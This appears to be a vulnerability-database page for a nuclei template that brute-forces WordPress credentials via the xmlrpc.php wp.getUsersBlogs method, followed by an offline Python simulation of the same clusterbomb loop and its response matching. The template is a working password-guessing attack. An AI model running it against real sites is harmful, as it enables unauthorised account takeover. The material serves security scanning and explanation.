wordpress-xmlrpc-brute-force: Wordpress XMLRPC.php username and password Bruteforcer

Date: 2025-08-01 | Affected software: wordpress | PoC: public

Vulnerability description

This template brute-forces WordPress usernames and passwords through xmlrpc.php when that endpoint is reachable. It calls the wp.getUsersBlogs XML-RPC method with each username/password pair from its two wordlists; WordPress authenticates the pair before answering, returning the user's blog list on a valid login and an XML-RPC fault (faultCode 403, "Incorrect username or password.") otherwise. Both answers come back with HTTP 200, so the template distinguishes them by the fields that only appear in the success response.

PoC code [public]

id: wordpress-xmlrpc-brute-force

info:
  name: Wordpress XMLRPC.php username and password Bruteforcer
  author: Exid
  severity: high
  description: This template brute-forces usernames and passwords through the wp.getUsersBlogs method when xmlrpc.php is available.
  reference:
    - https://bugdasht.ir/reports/3c6841c0-ae4c-11eb-a510-517171a9198c
    - https://www.acunetix.com/vulnerabilities/web/wordpress-xml-rpc-authentication-brute-force/
  metadata:
    # clusterbomb sends one request per username/password combination,
    # so this is the product of the two bundled wordlist sizes
    max-request: 276
  tags: wordpress,php,xmlrpc,fuzz,vuln

http:
  # the literal Content-Length below is not the body length once the payloads
  # are substituted; nuclei recomputes it for (non-unsafe) raw requests
  - raw:
      - |
        POST /xmlrpc.php HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 235

        <?xml version="1.0" encoding="UTF-8"?>
        <methodCall>
          <methodName>wp.getUsersBlogs</methodName>
          <params>
            <param>
              <value>{{username}}</value>
            </param>
            <param>
              <value>{{password}}</value>
            </param>
          </params>
        </methodCall>

    # every username is tried against every password (cartesian product)
    attack: clusterbomb
    payloads:
      username: helpers/wordlists/wp-users.txt
      password: helpers/wordlists/wp-passwords.txt

    # wp.getUsersBlogs returns the blog list (with url, xmlrpc and isAdmin
    # members) only for valid credentials; a bad login is an XML-RPC fault
    # (faultCode 403) that is also HTTP 200 but contains none of these words
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - 'url'
          - 'xmlrpc'
          - 'isAdmin'
        condition: and
# digest: 4a0a00473045022100f3985c1b023e44971f87a2c5ad98728da6bc2ceb34c71383ea22af1d3bfafb8e022004da4e1aac71abc24307ebaf70c5b890a7047a4820933cacd3332071402413bb:922c64590222798bb761d5b6d8e72950
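The following is an added, offline walk-through of the credential check the template relies on; it is example code written for this page, not part of the template or of the nuclei project. It builds the same wp.getUsersBlogs call, runs a clusterbomb loop against a constructed stand-in for /xmlrpc.php (no traffic is sent; the account name, password, wordlists and blog URL are made up), and applies the template's word matcher next to a stricter check that actually parses the XML-RPC response instead of grepping it.

```python
"""Offline model of the wp.getUsersBlogs brute force used by the template.

Example code added for this page, not the template author's. FakeWordPress is a
constructed stand-in for a real /xmlrpc.php; all credentials and URLs are made up.
"""
import itertools
import xmlrpc.client


def build_request(username: str, password: str) -> bytes:
    """Serialize the same XML-RPC call the template's raw request carries."""
    return xmlrpc.client.dumps(
        (username, password), methodname="wp.getUsersBlogs"
    ).encode()


# Constructed response bodies shaped like WordPress's real ones (values made up).
# A valid login returns an array of blog structs; a bad login returns a fault.
SUCCESS_BODY = xmlrpc.client.dumps(
    ([{"isAdmin": True, "url": "http://blog.example/", "blogid": "1",
       "blogName": "Example", "xmlrpc": "http://blog.example/xmlrpc.php"}],),
    methodresponse=True,
).encode()
FAULT_BODY = xmlrpc.client.dumps(
    xmlrpc.client.Fault(403, "Incorrect username or password."),
    methodresponse=True,
).encode()


class FakeWordPress:
    """Stand-in for /xmlrpc.php with one valid account; counts requests seen."""

    def __init__(self, valid_credentials):
        self.valid = valid_credentials
        self.requests = 0

    def handle(self, body: bytes):
        self.requests += 1
        (user, pw), method = xmlrpc.client.loads(body)
        if method != "wp.getUsersBlogs":
            raise ValueError("unexpected method " + str(method))
        if (user, pw) == self.valid:
            return 200, SUCCESS_BODY
        return 200, FAULT_BODY  # WordPress answers XML-RPC faults with HTTP 200


def template_matcher(status: int, body: bytes) -> bool:
    """The template's matchers: HTTP 200 AND all three words present in the body."""
    text = body.decode()
    return status == 200 and all(w in text for w in ("url", "xmlrpc", "isAdmin"))


def parse_response(body: bytes):
    """Stricter check: parse the response and branch on fault vs. blog list."""
    try:
        (blogs,), _ = xmlrpc.client.loads(body)
    except xmlrpc.client.Fault as fault:
        return ("fault", fault.faultCode)
    return ("ok", [blog["url"] for blog in blogs])


def clusterbomb(server, usernames, passwords):
    """Try every username with every password, as attack: clusterbomb does."""
    hits = []
    for user, pw in itertools.product(usernames, passwords):
        status, body = server.handle(build_request(user, pw))
        if template_matcher(status, body):
            hits.append((user, pw))
    return hits


if __name__ == "__main__":
    # Constructed wordlists standing in for wp-users.txt / wp-passwords.txt.
    users = ["admin", "editor", "wpuser"]
    passwords = ["password", "123456", "Winter2024!", "letmein"]
    server = FakeWordPress(("admin", "Winter2024!"))
    found = clusterbomb(server, users, passwords)
    print("requests sent:", server.requests, "(= %d x %d)" % (len(users), len(passwords)))
    print("valid credentials:", found)
    print("parsed success:", parse_response(SUCCESS_BODY))
    print("parsed failure:", parse_response(FAULT_BODY))
```

The request count is the product of the two wordlist sizes, which is why the template's max-request metadata grows quickly with larger lists. Grepping for the three words is adequate against stock WordPress, but parse_response shows the more robust approach: a fault with faultCode 403 is a rejected login, anything else that parses as a blog list is a hit, and an unparseable body (WAF block page, rate-limit response) is neither.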
